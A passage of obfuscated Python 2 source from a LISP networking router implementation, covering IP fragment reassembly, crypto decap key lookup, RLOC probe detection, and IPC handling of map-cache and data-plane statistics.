oOoo = lisp_reassembly_queue [ i11iiI ]
if 59 - 59: OOooOOo % IiII . ooOoO0o + O0 . ooOoO0o + iIii1I11I1II1
if 68 - 68: i11iIiiIii . iII111i + OoooooooOO + II111iiii + iIii1I11I1II1 % I11i
if 7 - 7: i1IIi - o0oOOo0O0Ooo - I1IiiI
if 62 - 62: OoOoOO00 * oO0o - I1IiiI / Ii1I
if 48 - 48: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoOoOO00
if ( len ( oOoo ) == 1 and oOoo [ 0 ] [ 2 ] == None ) :
dprint ( "Drop non-LISP encapsulated fragment 0x{}" . format ( lisp_hex_string ( i11iiI ) . zfill ( 4 ) ) )
if 13 - 13: OoO0O00 - Ii1I . ooOoO0o / O0 * OoOoOO00
return ( None )
if 57 - 57: O0 + OoooooooOO % o0oOOo0O0Ooo / I1Ii111 / OOooOOo - OoOoOO00
if 48 - 48: o0oOOo0O0Ooo - II111iiii + OoOoOO00
if 54 - 54: II111iiii - OoO0O00 - o0oOOo0O0Ooo - O0 % I1Ii111
if 9 - 9: i1IIi % iII111i / Ii1I
if 83 - 83: oO0o
oOoo . append ( i1ii1i1Ii11 )
oOoo = sorted ( oOoo )
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
IiiIIi1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
IiiIIi1 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
oO000o0o0 = IiiIIi1 . print_address_no_iid ( )
IiiIIi1 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 16 : 20 ] ) [ 0 ] )
I1iI11I1II = IiiIIi1 . print_address_no_iid ( )
IiiIIi1 = red ( "{} -> {}" . format ( oO000o0o0 , I1iI11I1II ) , False )
if 54 - 54: Ii1I - OoooooooOO % I1IiiI + oO0o
dprint ( "{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}" . format ( bold ( "Received" , False ) , " non-LISP encapsulated" if i1ii1i1Ii11 [ 2 ] == None else "" , IiiIIi1 , lisp_hex_string ( i11iiI ) . zfill ( 4 ) ,
# I11i / iIii1I11I1II1 * Oo0Ooo % i1IIi % OoOoOO00
# oO0o
lisp_hex_string ( oo00o00O0 ) . zfill ( 4 ) ) )
if 94 - 94: OoO0O00 * I1IiiI / O0 + I1Ii111 / i11iIiiIii
if 34 - 34: Oo0Ooo . i1IIi
if 97 - 97: I11i
if 89 - 89: iII111i % OoOoOO00 . Oo0Ooo
if 20 - 20: oO0o % OoOoOO00
if ( oOoo [ 0 ] [ 0 ] != 0 or oOoo [ - 1 ] [ 3 ] == False ) : return ( None )
OO00ooo0 = oOoo [ 0 ]
for ii11I in oOoo [ 1 : : ] :
oo00o00O0 = ii11I [ 0 ]
IIi1I , O00oO00ooo0ooOOOO = OO00ooo0 [ 0 ] , OO00ooo0 [ 1 ]
if ( IIi1I + O00oO00ooo0ooOOOO != oo00o00O0 ) : return ( None )
OO00ooo0 = ii11I
if 84 - 84: ooOoO0o + OOooOOo * OoO0O00
lisp_reassembly_queue . pop ( i11iiI )
if 39 - 39: OoooooooOO * OoooooooOO
if 49 - 49: o0oOOo0O0Ooo + i1IIi / iII111i
if 43 - 43: i1IIi . OoO0O00 + I1ii11iIi11i
if 88 - 88: OoooooooOO / I11i % II111iiii % OOooOOo - I11i
if 55 - 55: Oo0Ooo - OOooOOo - O0
packet = oOoo [ 0 ] [ 2 ]
for ii11I in oOoo [ 1 : : ] : packet += ii11I [ 2 ] [ 20 : : ]
if 40 - 40: OoOoOO00 - OOooOOo
dprint ( "{} fragments arrived for packet 0x{}, length {}" . format ( bold ( "All" , False ) , lisp_hex_string ( i11iiI ) . zfill ( 4 ) , len ( packet ) ) )
if 3 - 3: IiII % I11i * I1Ii111 + iIii1I11I1II1 . oO0o
if 35 - 35: II111iiii
if 15 - 15: I11i * iIii1I11I1II1 + OOooOOo % IiII . o0oOOo0O0Ooo % Oo0Ooo
if 96 - 96: O0
if 15 - 15: i1IIi . iIii1I11I1II1
IiiI1iii1iIiiI = socket . htons ( len ( packet ) )
O0ooOoO0 = packet [ 0 : 2 ] + struct . pack ( "H" , IiiI1iii1iIiiI ) + packet [ 4 : 6 ] + struct . pack ( "H" , 0 ) + packet [ 8 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : 20 ]
if 3 - 3: II111iiii * i11iIiiIii * i1IIi - i1IIi
if 11 - 11: I1IiiI % Ii1I * i11iIiiIii % OOooOOo + II111iiii
O0ooOoO0 = lisp_ip_checksum ( O0ooOoO0 )
return ( O0ooOoO0 + packet [ 20 : : ] )
if 61 - 61: I1Ii111 + I11i + I1IiiI
if 48 - 48: I11i
if 67 - 67: o0oOOo0O0Ooo
if 36 - 36: IiII - I11i - Ii1I / OoOoOO00 % OoO0O00 * iIii1I11I1II1
if 61 - 61: i11iIiiIii / Ii1I - OOooOOo . I1ii11iIi11i
if 89 - 89: ooOoO0o % i11iIiiIii
if 57 - 57: Oo0Ooo / ooOoO0o - O0 . ooOoO0o
if 61 - 61: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i + Oo0Ooo
def lisp_get_crypto_decap_lookup_key ( addr , port ) :
oo0o00OO = addr . print_address_no_iid ( ) + ":" + str ( port )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) : return ( oo0o00OO )
if 75 - 75: Ii1I
oo0o00OO = addr . print_address_no_iid ( )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) : return ( oo0o00OO )
if 79 - 79: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo / I11i . I11i / ooOoO0o
if 99 - 99: oO0o + I11i % i1IIi . iII111i
if 58 - 58: Oo0Ooo % i11iIiiIii . Oo0Ooo / Oo0Ooo - I1IiiI . Ii1I
if 65 - 65: OoO0O00
if 16 - 16: IiII % I1IiiI % iIii1I11I1II1 . I1IiiI . I1ii11iIi11i - IiII
for I1II1i in lisp_crypto_keys_by_rloc_decap :
OO0o = I1II1i . split ( ":" )
if ( len ( OO0o ) == 1 ) : continue
OO0o = OO0o [ 0 ] if len ( OO0o ) == 2 else ":" . join ( OO0o [ 0 : - 1 ] )
if ( OO0o == oo0o00OO ) :
iIi11III = lisp_crypto_keys_by_rloc_decap [ I1II1i ]
lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] = iIi11III
return ( oo0o00OO )
if 16 - 16: iIii1I11I1II1 . I1Ii111 * OoO0O00
if 78 - 78: iIii1I11I1II1 + I11i - OoOoOO00 / I1ii11iIi11i + iIii1I11I1II1 % II111iiii
return ( None )
if 55 - 55: I11i . iIii1I11I1II1 / Ii1I - OoO0O00 * I1ii11iIi11i % iIii1I11I1II1
if 48 - 48: ooOoO0o + Oo0Ooo / Oo0Ooo
if 15 - 15: iIii1I11I1II1 . I1Ii111 * OoooooooOO * O0 % OOooOOo
if 53 - 53: Ii1I
if 63 - 63: I11i % OoOoOO00
if 46 - 46: iIii1I11I1II1 . II111iiii / OoooooooOO - ooOoO0o * iII111i
if 52 - 52: I11i + iII111i
if 9 - 9: OoOoOO00 % II111iiii . I11i * Oo0Ooo
if 53 - 53: II111iiii / i1IIi + OoooooooOO * O0
if 62 - 62: IiII . O0
if 87 - 87: I1ii11iIi11i / oO0o / IiII . OOooOOo
def lisp_build_crypto_decap_lookup_key ( addr , port ) :
addr = addr . print_address_no_iid ( )
O0oOoOOOOo = addr + ":" + str ( port )
if 66 - 66: OoOoOO00 . Ii1I / i11iIiiIii / ooOoO0o
if ( lisp_i_am_rtr ) :
if ( lisp_rloc_probe_list . has_key ( addr ) ) : return ( addr )
if 76 - 76: OoO0O00 % OoO0O00 / I1ii11iIi11i * ooOoO0o * o0oOOo0O0Ooo - I1Ii111
if 53 - 53: OoO0O00 % Oo0Ooo . i1IIi
if 34 - 34: Ii1I - o0oOOo0O0Ooo * i1IIi
if 7 - 7: OoO0O00 * I1ii11iIi11i / I1Ii111
if 98 - 98: II111iiii % I1ii11iIi11i
if 48 - 48: iII111i % oO0o + oO0o - Oo0Ooo . OOooOOo
for IIiiiiII in lisp_nat_state_info . values ( ) :
for oO0ooo in IIiiiiII :
if ( addr == oO0ooo . address ) : return ( O0oOoOOOOo )
if 38 - 38: iII111i
if 66 - 66: iII111i + Oo0Ooo + i1IIi * Oo0Ooo
return ( addr )
if 18 - 18: O0 - IiII
return ( O0oOoOOOOo )
if 5 - 5: I1ii11iIi11i * iII111i + II111iiii * Oo0Ooo * O0 - I1IiiI
if 71 - 71: i11iIiiIii % I1IiiI + I1ii11iIi11i + II111iiii + OoooooooOO + oO0o
if 12 - 12: I1IiiI + I1Ii111
if 66 - 66: I1Ii111 + OOooOOo + I1Ii111 . OoooooooOO * oO0o / OoO0O00
if 74 - 74: O0 % OOooOOo * OoOoOO00 / oO0o - Oo0Ooo
if 79 - 79: Ii1I + IiII
if 21 - 21: o0oOOo0O0Ooo * iII111i * o0oOOo0O0Ooo * o0oOOo0O0Ooo . Oo0Ooo
def lisp_set_ttl ( lisp_socket , ttl ) :
try :
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_TTL , ttl )
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_MULTICAST_TTL , ttl )
except :
lprint ( "socket.setsockopt(IP_TTL) not supported" )
pass
if 98 - 98: I1ii11iIi11i
return
if 58 - 58: IiII / i11iIiiIii % I11i
if 74 - 74: OoooooooOO - I1ii11iIi11i + OOooOOo % IiII . o0oOOo0O0Ooo
if 21 - 21: Ii1I
if 72 - 72: I1Ii111 . OoooooooOO / I1Ii111 - Ii1I / I1ii11iIi11i * I1ii11iIi11i
if 72 - 72: IiII . Ii1I + OoooooooOO * OoOoOO00 + Oo0Ooo . iII111i
if 92 - 92: O0 * Ii1I - I1ii11iIi11i - IiII . OoO0O00 + I1IiiI
if 59 - 59: i1IIi * OOooOOo % Oo0Ooo
def lisp_is_rloc_probe_request ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x12 )
if 44 - 44: iIii1I11I1II1 . OOooOOo
if 57 - 57: II111iiii + I1Ii111
if 42 - 42: OoOoOO00 % O0
if 70 - 70: iIii1I11I1II1 * Oo0Ooo - I1IiiI / OoO0O00 + OoOoOO00
if 94 - 94: OoooooooOO + O0 * iIii1I11I1II1 * II111iiii
if 90 - 90: I11i + O0 / I1IiiI . oO0o / O0
if 46 - 46: O0 . O0 - oO0o . II111iiii * I1IiiI * Ii1I
def lisp_is_rloc_probe_reply ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x28 )
if 10 - 10: i1IIi + i1IIi . i1IIi - I1IiiI - I1IiiI
if 26 - 26: Ii1I * I11i / I11i
if 79 - 79: ooOoO0o / oO0o - oO0o / OoooooooOO
if 91 - 91: iIii1I11I1II1 - O0 * o0oOOo0O0Ooo * o0oOOo0O0Ooo . II111iiii
if 69 - 69: II111iiii - Oo0Ooo + i1IIi . II111iiii + o0oOOo0O0Ooo
if 20 - 20: OoooooooOO - OoO0O00 * ooOoO0o * OoOoOO00 / OOooOOo
if 64 - 64: O0 + iII111i / I11i * OoOoOO00 + o0oOOo0O0Ooo + I1Ii111
if 16 - 16: I11i
if 9 - 9: Ii1I / IiII * I11i - i11iIiiIii * I1ii11iIi11i / iII111i
if 61 - 61: O0 % iII111i
if 41 - 41: I1Ii111 * OoooooooOO
if 76 - 76: OoooooooOO * II111iiii . II111iiii / o0oOOo0O0Ooo - iII111i
if 49 - 49: O0 . I1ii11iIi11i . OoOoOO00 . I1Ii111 % O0 . iIii1I11I1II1
if 19 - 19: iIii1I11I1II1
if 97 - 97: Ii1I . I11i / ooOoO0o + Oo0Ooo
if 100 - 100: iII111i / I1Ii111 % OoOoOO00 . O0 / OoOoOO00
if 81 - 81: OoO0O00 % i11iIiiIii / OoO0O00 + ooOoO0o
if 100 - 100: O0 . Oo0Ooo % Oo0Ooo % O0 / i11iIiiIii
if 56 - 56: IiII - OOooOOo - OoOoOO00 - I11i
def lisp_is_rloc_probe ( packet , rr ) :
o0oOo00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == 17 )
if ( o0oOo00 == False ) : return ( [ packet , None , None , None ] )
if 57 - 57: i1IIi
oo0O = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
O0o0o0ooO0ooo = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
i11i = ( socket . htons ( LISP_CTRL_PORT ) in [ oo0O , O0o0o0ooO0ooo ] )
if ( i11i == False ) : return ( [ packet , None , None , None ] )
if 27 - 27: iII111i / iII111i
if ( rr == 0 ) :
oO0oo000O = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( oO0oo000O == False ) : return ( [ packet , None , None , None ] )
elif ( rr == 1 ) :
oO0oo000O = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( oO0oo000O == False ) : return ( [ packet , None , None , None ] )
elif ( rr == - 1 ) :
oO0oo000O = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( oO0oo000O == False ) :
oO0oo000O = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( oO0oo000O == False ) : return ( [ packet , None , None , None ] )
if 19 - 19: iII111i + I1ii11iIi11i
if 81 - 81: iIii1I11I1II1 * OoO0O00 - Ii1I / oO0o - ooOoO0o
if 6 - 6: I1IiiI - oO0o + OoO0O00
if 58 - 58: iIii1I11I1II1 + OoOoOO00
if 65 - 65: iII111i % Oo0Ooo * iIii1I11I1II1 + I1IiiI + II111iiii
if 72 - 72: OoOoOO00 . OoooooooOO - OOooOOo
i1IIi1ii1i1ii = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
i1IIi1ii1i1ii . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
if ( i1IIi1ii1i1ii . is_local ( ) ) : return ( [ None , None , None , None ] )
if 59 - 59: OOooOOo - o0oOOo0O0Ooo - o0oOOo0O0Ooo % I1IiiI
if 55 - 55: o0oOOo0O0Ooo % I1ii11iIi11i - IiII + OoooooooOO
if 44 - 44: iII111i * I1Ii111 - I1IiiI % i1IIi
if 35 - 35: iII111i . OoOoOO00 + i1IIi . I1Ii111 - oO0o
i1IIi1ii1i1ii = i1IIi1ii1i1ii . print_address_no_iid ( )
Oo0O00O = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
oOoooOOO0o0 = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
packet = packet [ 28 : : ]
if 92 - 92: o0oOOo0O0Ooo
O0OOOO0o0O = bold ( "Receive(pcap)" , False )
OOO000 = bold ( "from " + i1IIi1ii1i1ii , False )
oo00ooOOOo0O = lisp_format_packet ( packet )
lprint ( "{} {} bytes {} {}, packet: {}" . format ( O0OOOO0o0O , len ( packet ) , OOO000 , Oo0O00O , oo00ooOOOo0O ) )
if 8 - 8: i1IIi / IiII . O0
return ( [ packet , i1IIi1ii1i1ii , Oo0O00O , oOoooOOO0o0 ] )
if 72 - 72: OOooOOo
if 20 - 20: i11iIiiIii + Oo0Ooo * Oo0Ooo % OOooOOo
if 66 - 66: I1ii11iIi11i + iII111i / Ii1I / I1IiiI * i11iIiiIii
if 41 - 41: Ii1I / Oo0Ooo . OoO0O00 . iIii1I11I1II1 % IiII . I11i
if 59 - 59: O0 + II111iiii + IiII % Oo0Ooo
if 71 - 71: oO0o
if 75 - 75: Oo0Ooo * oO0o + iIii1I11I1II1 / Oo0Ooo
if 51 - 51: Ii1I * Ii1I + iII111i * oO0o / OOooOOo - ooOoO0o
if 16 - 16: I1Ii111 + O0 - O0 * iIii1I11I1II1 / iII111i
if 4 - 4: iII111i
if 75 - 75: I1IiiI * IiII % OoO0O00 - ooOoO0o * iII111i
def lisp_ipc_write_xtr_parameters ( cp , dp ) :
if ( lisp_ipc_dp_socket == None ) : return
if 32 - 32: iII111i
iiiii1i1 = { "type" : "xtr-parameters" , "control-plane-logging" : cp ,
"data-plane-logging" : dp , "rtr" : lisp_i_am_rtr }
if 59 - 59: OoOoOO00 - I1Ii111
lisp_write_to_dp_socket ( iiiii1i1 )
return
if 34 - 34: ooOoO0o . OoooooooOO / ooOoO0o + OoooooooOO
if 24 - 24: OoooooooOO * I1ii11iIi11i / O0 / Oo0Ooo * I1IiiI / ooOoO0o
if 33 - 33: Ii1I
if 20 - 20: Ii1I + I11i
if 98 - 98: OOooOOo
if 58 - 58: i11iIiiIii / OoOoOO00
if 18 - 18: ooOoO0o + O0 - OOooOOo + iIii1I11I1II1 . OOooOOo * iIii1I11I1II1
if 83 - 83: OoO0O00 - Oo0Ooo * I1IiiI % Oo0Ooo % oO0o
def lisp_external_data_plane ( ) :
ooO0ooooO = 'egrep "ipc-data-plane = yes" ./lisp.config'
if ( commands . getoutput ( ooO0ooooO ) != "" ) : return ( True )
if 64 - 64: OoOoOO00 + oO0o / OoooooooOO . i11iIiiIii / II111iiii
if ( os . getenv ( "LISP_RUN_LISP_XTR" ) != None ) : return ( True )
return ( False )
if 55 - 55: ooOoO0o . i11iIiiIii . o0oOOo0O0Ooo
if 52 - 52: IiII . oO0o + i11iIiiIii % IiII
if 45 - 45: i1IIi - I1IiiI / IiII - I1IiiI
if 21 - 21: IiII
if 43 - 43: IiII
if 9 - 9: OOooOOo * ooOoO0o + ooOoO0o . I1Ii111
if 8 - 8: IiII * iIii1I11I1II1
if 7 - 7: I1Ii111 / OoooooooOO % O0 - I1ii11iIi11i
if 49 - 49: OoooooooOO . I1ii11iIi11i / OoooooooOO * oO0o
if 81 - 81: I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
if 84 - 84: OoooooooOO
if 95 - 95: o0oOOo0O0Ooo
if 22 - 22: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
if 41 - 41: oO0o . II111iiii
def lisp_process_data_plane_restart ( do_clear = False ) :
os . system ( "touch ./lisp.config" )
if 47 - 47: I1ii11iIi11i
iiIiiI = { "type" : "entire-map-cache" , "entries" : [ ] }
if 73 - 73: I1Ii111 / i11iIiiIii * iIii1I11I1II1 + OoOoOO00 + I1IiiI
if ( do_clear == False ) :
Oo0O0Oo0oo = iiIiiI [ "entries" ]
lisp_map_cache . walk_cache ( lisp_ipc_walk_map_cache , Oo0O0Oo0oo )
if 84 - 84: I1IiiI / I1IiiI + OoO0O00 . i1IIi . I1IiiI / OoOoOO00
if 90 - 90: IiII . OoooooooOO - i11iIiiIii . OoooooooOO - I1ii11iIi11i
lisp_write_to_dp_socket ( iiIiiI )
return
if 54 - 54: I1Ii111 % II111iiii - Ii1I . OoO0O00 + ooOoO0o / iII111i
if 85 - 85: o0oOOo0O0Ooo - O0
if 3 - 3: iIii1I11I1II1
if 73 - 73: I1IiiI * OoooooooOO * iIii1I11I1II1 * Oo0Ooo
if 76 - 76: OoO0O00 / i11iIiiIii % ooOoO0o % I11i * O0
if 84 - 84: II111iiii - iII111i / IiII . O0 % i1IIi / I1ii11iIi11i
if 2 - 2: OoooooooOO . OoO0O00 . II111iiii / Ii1I - OOooOOo % Oo0Ooo
if 47 - 47: OOooOOo * oO0o
if 41 - 41: OoooooooOO * I1IiiI
if 3 - 3: IiII
if 96 - 96: I11i - OOooOOo + I11i
if 71 - 71: Oo0Ooo
if 48 - 48: o0oOOo0O0Ooo / II111iiii / OoOoOO00 * o0oOOo0O0Ooo + I1IiiI . OoOoOO00
if 52 - 52: Ii1I / OoOoOO00 . OOooOOo * IiII . OoooooooOO
def lisp_process_data_plane_stats ( msg , lisp_sockets , lisp_port ) :
if ( msg . has_key ( "entries" ) == False ) :
lprint ( "No 'entries' in stats IPC message" )
return
if 6 - 6: i1IIi . oO0o % IiII . Oo0Ooo % I11i
if ( type ( msg [ "entries" ] ) != list ) :
lprint ( "'entries' in stats IPC message must be an array" )
return
if 86 - 86: OoooooooOO + IiII % o0oOOo0O0Ooo . i1IIi . iII111i
if 25 - 25: iII111i * I1ii11iIi11i + I11i - I1ii11iIi11i
for msg in msg [ "entries" ] :
if ( msg . has_key ( "eid-prefix" ) == False ) :
lprint ( "No 'eid-prefix' in stats IPC message" )
continue
if 75 - 75: IiII
I11i11i1 = msg [ "eid-prefix" ]
if 74 - 74: o0oOOo0O0Ooo - iIii1I11I1II1
if ( msg . has_key ( "instance-id" ) == False ) :
lprint ( "No 'instance-id' in stats IPC message" )
continue
if 92 - 92: i11iIiiIii * iIii1I11I1II1 - I1Ii111 . i1IIi
o0OoO0000o = int ( msg [ "instance-id" ] )
if 23 - 23: O0 - O0 . I1Ii111 . I1IiiI - I1IiiI * i1IIi
if 8 - 8: I1IiiI . I1ii11iIi11i + oO0o % oO0o * oO0o
if 70 - 70: II111iiii + IiII + O0 / Ii1I - i11iIiiIii
if 72 - 72: II111iiii - II111iiii
ooOOoo0 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
ooOOoo0 . store_prefix ( I11i11i1 )
o0o000Oo = lisp_map_cache_lookup ( None , ooOOoo0 )
if ( o0o000Oo == None ) :
lprint ( "Map-cache entry for {} not found for stats update" . format ( I11i11i1 ) )
if 44 - 44: o0oOOo0O0Ooo + OoooooooOO
continue
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
if 87 - 87: OOooOOo * OoO0O00
if ( msg . has_key ( "rlocs" ) == False ) :
lprint ( "No 'rlocs' in stats IPC message for {}" . format ( I11i11i1 ) )
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
continue
if 86 - 86: II111iiii
if ( type ( msg [ "rlocs" ] ) != list ) :
lprint ( "'rlocs' in stats IPC message must be an array" )
continue
if 94 - 94: o0oOOo0O0Ooo % Ii1I * Ii1I % Oo0Ooo / I1ii11iIi11i
IIiii1i1IiI = msg [ "rlocs" ]
if 56 - 56: O0 % i11iIiiIii - O0
if 24 - 24: o0oOOo0O0Ooo % iII111i
if 47 - 47: OoooooooOO
if 65 - 65: I1ii11iIi11i . o0oOOo0O0Ooo * I1Ii111
for O0o0O00O in IIiii1i1IiI :
if ( O0o0O00O . has_key ( "rloc" ) == False ) : continue
if 29 - 29: I1Ii111
o0oooOoOoOo = O0o0O00O [ "rloc" ]
if ( o0oooOoOoOo == "no-address" ) : continue
if 61 - 61: I1ii11iIi11i % oO0o + OoooooooOO - ooOoO0o . OOooOOo + OoOoOO00
I1IIiIIIii = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
I1IIiIIIii . store_address ( o0oooOoOoOo )
if 53 - 53: o0oOOo0O0Ooo
i1III111 = o0o000Oo . get_rloc ( I1IIiIIIii )
if ( i1III111 == None ) : continue
if 55 - 55: ooOoO0o . i1IIi - ooOoO0o + O0 + I1IiiI
if 31 - 31: OoO0O00 % I1Ii111
if 62 - 62: oO0o / O0 - I1Ii111 . IiII
if 81 - 81: i11iIiiIii
o00oooOOooo0 = 0 if O0o0O00O . has_key ( "packet-count" ) == False else O0o0O00O [ "packet-count" ]
if 99 - 99: O0 / OoO0O00 * II111iiii . II111iiii
IiIiIiiiI1 = 0 if O0o0O00O . has_key ( "byte-count" ) == False else O0o0O00O [ "byte-count" ]
if 14 - 14: OoOoOO00 * i1IIi - OoOoOO00 . OoooooooOO
i1 = 0 if O0o0O00O . has_key ( "seconds-last-packet" ) == False else O0o0O00O [ "seconds-last-packet" ]
if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
i1III111 . stats . packet_count += o00oooOOooo0
i1III111 . stats . byte_count += IiIiIiiiI1
i1III111 . stats . last_increment = lisp_get_timestamp ( ) - i1
if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
lprint ( "Update stats {}/{}/{}s for {} RLOC {}" . format ( o00oooOOooo0 , IiIiIiiiI1 ,
i1 , I11i11i1 , o0oooOoOoOo ) )
if 50 - 50: iII111i * O0 % II111iiii
if 80 - 80: OOooOOo - II111iiii - OoO0O00
if 62 - 62: Ii1I . i11iIiiIii % OOooOOo
if 44 - 44: i1IIi * I1ii11iIi11i % Ii1I . Ii1I * I11i + II111iiii
if 15 - 15: i1IIi - I11i - I1Ii111 / OoO0O00 + Oo0Ooo + I1IiiI
if ( o0o000Oo . group . is_null ( ) and o0o000Oo . has_ttl_elapsed ( ) ) :
I11i11i1 = green ( o0o000Oo . print_eid_tuple ( ) , False )
lprint ( "Refresh map-cache entry {}" . format ( I11i11i1 ) )
lisp_send_map_request ( lisp_sockets , lisp_port , None , o0o000Oo . eid , None )
if 81 - 81: IiII
if 54 - 54: I1IiiI % OoO0O00 % OoOoOO00
return
if 12 - 12: II111iiii . O0 * i11iIiiIii . I11i
if 98 - 98: II111iiii + i1IIi * oO0o % I1IiiI
if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
if 79 - 79: IiII + I1Ii111
if 59 - 59: iII111i - oO0o . ooOoO0o / IiII * i11iIiiIii
if 61 - 61: I11i - Oo0Ooo * II111iiii + iIii1I11I1II1
if 37 - 37: OoooooooOO % II111iiii / o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i . iIii1I11I1II1
if 73 - 73: OoOoOO00
if 44 - 44: Oo0Ooo / oO0o
if 9 - 9: i1IIi % I1IiiI + OoO0O00 * ooOoO0o / iIii1I11I1II1 / iII111i
if 80 - 80: OOooOOo / O0 % IiII * OoOoOO00
if 53 - 53: OOooOOo + i11iIiiIii
if 25 - 25: i11iIiiIii
if 51 - 51: iII111i . ooOoO0o
if 70 - 70: I11i / O0 - I11i + o0oOOo0O0Ooo . ooOoO0o . o0oOOo0O0Ooo
if 6 - 6: I11i + II111iiii - I1Ii111
if 45 - 45: i1IIi / iII111i + i11iIiiIii * I11i + ooOoO0o / OoooooooOO
if 56 - 56: I11i + I1Ii111
if 80 - 80: II111iiii . Ii1I + o0oOOo0O0Ooo / II111iiii / OoO0O00 + iIii1I11I1II1
if 29 - 29: o0oOOo0O0Ooo + OoOoOO00 + ooOoO0o - I1ii11iIi11i
if 64 - 64: O0 / OoooooooOO
def lisp_process_data_plane_decap_stats ( msg , lisp_ipc_socket ) :
if 28 - 28: I1ii11iIi11i + oO0o . Oo0Ooo % iIii1I11I1II1 / I1Ii111
if 8 - 8: O0 . I1IiiI * o0oOOo0O0Ooo + I1IiiI
if 44 - 44: i1IIi % iII111i . i11iIiiIii / I11i + OoooooooOO
if 21 - 21: OoOoOO00 . OoO0O00 . OoOoOO00 + OoOoOO00
if 30 - 30: I1IiiI - iII111i - OOooOOo + oO0o
if ( lisp_i_am_itr ) :
lprint ( "Send decap-stats IPC message to lisp-etr process" )
iiiii1i1 = "stats%{}" . format ( json . dumps ( msg ) )
iiiii1i1 = lisp_command_ipc ( iiiii1i1 , "lisp-itr" )
lisp_ipc ( iiiii1i1 , lisp_ipc_socket , "lisp-etr" )
return
if 51 - 51: Ii1I % O0 / II111iiii . Oo0Ooo
if 90 - 90: i11iIiiIii * II111iiii % iIii1I11I1II1 . I1ii11iIi11i / Oo0Ooo . OOooOOo
if 77 - 77: OoO0O00
if 95 - 95: II111iiii
if 59 - 59: iIii1I11I1II1 % OOooOOo / OoOoOO00 * I1Ii111 * OoooooooOO * O0
if 43 - 43: OoO0O00 * I1IiiI * OOooOOo * O0 - O0 / o0oOOo0O0Ooo
if 77 - 77: I11i % I1Ii111 . IiII % OoooooooOO * o0oOOo0O0Ooo
if 87 - 87: iII111i + IiII / ooOoO0o * ooOoO0o * OOooOOo
iiiii1i1 = bold ( "IPC" , False )
lprint ( "Process decap-stats {} message: '{}'" . format ( iiiii1i1 , msg ) )
if 97 - 97: I1Ii111
if ( lisp_i_am_etr ) : msg = json . loads ( msg )
if 47 - 47: iII111i / I1ii11iIi11i - Ii1I . II111iiii
Oo0oOO0O = [ "good-packets" , "ICV-error" , "checksum-error" ,
"lisp-header-error" , "no-decrypt-key" , "bad-inner-version" ,
"outer-header-error" ]
if 60 - 60: o0oOOo0O0Ooo
for O0OOooo0 in Oo0oOO0O :
o00oooOOooo0 = 0 if msg . has_key ( O0OOooo0 ) == False else msg [ O0OOooo0 ] [ "packet-count" ]
if 46 - 46: I11i
lisp_decap_stats [ O0OOooo0 ] . packet_count += o00oooOOooo0
if 58 - 58: Ii1I
IiIiIiiiI1 = 0 if msg . has_key ( O0OOooo0 ) == False else msg [ O0OOooo0 ] [ "byte-count" ]
if 35 - 35: OoO0O00 + OoOoOO00
lisp_decap_stats [ O0OOooo0 ] . byte_count += IiIiIiiiI1
if 22 - 22: II111iiii / I1IiiI + o0oOOo0O0Ooo * I1IiiI . OoooooooOO * OOooOOo
i1 = 0 if msg . has_key ( O0OOooo0 ) == False else msg [ O0OOooo0 ] [ "seconds-last-packet" ]
if 49 - 49: I1ii11iIi11i * I1IiiI + OOooOOo + i11iIiiIii * I1ii11iIi11i . o0oOOo0O0Ooo
